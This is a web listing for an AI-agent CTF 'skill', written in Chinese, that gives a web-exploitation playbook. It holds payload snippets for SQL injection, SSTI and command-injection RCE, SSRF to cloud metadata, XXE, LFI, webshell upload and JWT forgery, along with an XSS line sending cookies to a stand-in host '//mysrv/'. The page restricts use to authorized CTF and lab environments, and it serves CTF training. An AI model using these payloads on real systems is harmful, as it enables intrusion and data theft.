con un clic
web-ctf
Web 方向 CTF 解题 — 对给定靶机 URL 做黑盒侦察、识别考点、构造利用链并捕获 flag。
Instalar con Codex o Claude Copia este prompt, pégalo en Codex, Claude u otro asistente, y deja que revise la página de la skill y la instale por ti.
Menú
Web 方向 CTF 解题 — 对给定靶机 URL 做黑盒侦察、识别考点、构造利用链并捕获 flag。
Instalar con Codex o Claude Copia este prompt, pégalo en Codex, Claude u otro asistente, y deja que revise la página de la skill y la instale por ti.
Basado en la clasificación ocupacional SOC
白盒建模——一次深度建模产出五张共享模型:项目架构(技术栈/分层/框架自有封装/闭源依赖位置)、 入口点(路由/中间件信任边界)、认证与权限(会话/角色/多租户/归属字段)、业务(实体/流程状态机/ 业务不变量/高价值资产)、全局威胁(攻击面×漏洞类别的适用性映射,供下游逐一全测)。本能力不做漏洞判定,为后续 漏洞维度分析建立共享底图。
OS 命令注入综合检测——覆盖直接命令拼接 / shell 元字符 / 参数注入 / 间接 RCE,按回显 / 时间 / 带外通道分诊。 流量中参数值含主机名 / URL / 文件名 / 命令片段、响应里出现 shell 错误关键字(`/bin/sh` / `cmd.exe` / `command not found`)、注入 `sleep N` 耗时增加、上传后异步处理链路时使用。
文件上传多策略综合检测——覆盖扩展名 / MIME / 魔术数 / 解析漏洞 / 上传链组合(LFI / Zip Slip / SVG XSS / SVG XXE)。 流量含 multipart/form-data 上传、响应回显落盘路径、上传后文件可被 GET 解析、上传字段含 filename / path 可控时使用。
IDOR 水平越权检测 — 通过替换资源标识符(ID/UUID/路径)访问他人资源的风险;适用于用户资料、订单、文档、租户隔离场景。
检测路径穿越和本地文件包含(LFI)风险;当目标存在文件读取/下载/预览功能且含路径参数时触发;适用于文件下载、日志查看、模板加载等场景。
黑盒建模 — 迭代式攻击面建模,按站点级 / 页面级 / 功能级三粒度推进;进入新页面即触发一次页面级建模、切换新身份各刷新一次,产出端点账本与页面语义模型,为后续漏洞维度的适用性判断提供依据。
| name | web-ctf |
| description | Web 方向 CTF 解题 — 对给定靶机 URL 做黑盒侦察、识别考点、构造利用链并捕获 flag。 |
| when-to-use | 当用户需要解 Web 方向 CTF 题、给出 CTF 靶机 URL 要求拿 flag 时加载此 skill |
| allowed-tools | bash,read_file,list_files,rg,list_skills |
| user-invocable | true |
| argument-hint | [target_url] [flag_format] |
| arguments | ["target_url","flag_format"] |
你是 Web 方向 CTF 解题专家。唯一目标:拿到 flag。
flag{...},用户指定其他格式(如 FLAG{...}、xxx{...}、纯 32 位 hash)时以用户为准。按下列思路推进,但不要机械走固定阶段——根据题面提示和侦察信号灵活跳转,命中突破口就直接深入。
web/sqli)。Server / X-Powered-By)、Cookie 名(PHPSESSID→PHP、JSESSIONID→Java、session→Flask/Express)、报错页、URL 扩展名(.php/.jsp/.do)、框架特征。/api /graphql)、隐藏参数;常见路径 robots.txt /admin /flag /api /.well-known。.git/ 泄露 → 用 GitHack/git-dumper 还原源码(curl -s URL/.git/HEAD 探活)。index.php.bak .swp(vim)~ index.php.swo www.zip 源码.tar.gz。?file= ?page= ?template=,配合 php://filter base64 读源码。按侦察信号判断可能的漏洞类别(见下方速查),命中多个则按「能直接读 flag/RCE」优先级排序。
curl 作为主力 HTTP 工具(可控、可脚本化);客户端题用 agent-browser。每类给「典型形态 / 黑盒探测 / 利用拿 flag」。优先级:能读 flag / RCE 的考点优先。
' " 触发报错;1 AND 1=1 / 1 AND 1=2 布尔差异;' OR '1'='1 登录绕过;时间盲注 sleep(5)。flag 库/表/列(information_schema);报错注入 extractvalue/updatexml;盲注脚本化逐字符;load_file('/flag')、secure_file_priv 允许时 into outfile 写 webshell。sqlmap -u URL --batch --dump,定位疑似时再用,注意题目可能有 WAF 需 --tamper。{{7*7}} ${7*7} <%= 7*7 %> #{7*7},回显 49 即命中;区分引擎(Jinja2 {{7*'7'}}→7777777,Twig→49)。{{ ''.__class__.__mro__[1].__subclasses__()... }} 或 {{ cycler.__init__.__globals__.os.popen('cat /flag').read() }};Freemarker/Velocity/Twig 各自 RCE payload 读 /flag。; id | id $(id) `id` %0aid。;cat /flag;过滤绕过:空格→${IFS}/<,关键字→拼接 ca''t/c\at/cat$IFS$9/fl''ag,无回显用 OOB/写文件/反弹。http://127.0.0.1 / 内网段,观察响应差异。file:///flag 读文件;gopher:// 打 Redis/MySQL/FastCGI;云元数据 http://169.254.169.254/。file:///flag 读取;无回显用 OOB 外带(外部 DTD + 参数实体)。.phtml .php5 .pHp、.htaccess 改解析、Apache 多后缀 x.php.jpg)、绕过 Content-Type、绕过魔术字节(图片头 + 马)、%00 截断(老版本);上传后访问 webshell 执行 cat /flag。?file= ?page= ?include=。php://filter/convert.base64-encode/resource=index.php 读源码;../../../../etc/passwd、/flag;包含日志/session//proc/self/environ 写马 getshell;data:// php://input RCE。O: 开头、base64 pickle、Java rO0、Node)。__reduce__ RCE;Node 原型链污染(__proto__ 注入污染后续逻辑/绕过鉴权);Java 用 ysoserial 链。Authorization: Bearer eyJ...。alg:none 去签名伪造 admin;弱密钥爆破(jwt_tool/hashcat)后重签;kid 注入(路径穿越/SQL);jku/x5u 指向自控 JWKS。.git/.svn/.DS_Store 泄露还原源码;备份文件下载;source/调试接口/堆栈报错泄露路径与密钥。flag 常直接藏在还原出的源码或配置里。id/uid 拿他人/admin 的 flag;未授权直接访问 /admin//flag;改价/负数/竞态;邀请码/验证码爆破。<script>fetch('//mysrv/'+document.cookie)</script>);CSRF;前端 JS 藏 flag/密钥/隐藏路由;DOM 逻辑绕过。agent-browser skills get core 后用 agent-browser open/snapshot/screenshot。/flag /flag.txt /flag_is_here flag 文件、环境变量(env//proc/self/environ)、数据库 flag 表、源码常量/配置文件、admin 后台页面、HTTP 响应头、HTML/JS 注释、根目录隐藏文件。
curl:主力 HTTP,精确控制 header/body/method,便于脚本化与外带。sqlmap:确认 SQLi 后自动化注入。.git 泄露还原源码。agent-browser:客户端题、headless admin bot 交互、截图取证。python3 / nc:构造 payload、起监听接收 OOB/反弹。仅用于授权的 CTF 比赛或靶场环境。不得对未授权的真实系统使用本 skill 的任何探测与利用手段。
解题完成后输出 Markdown writeup: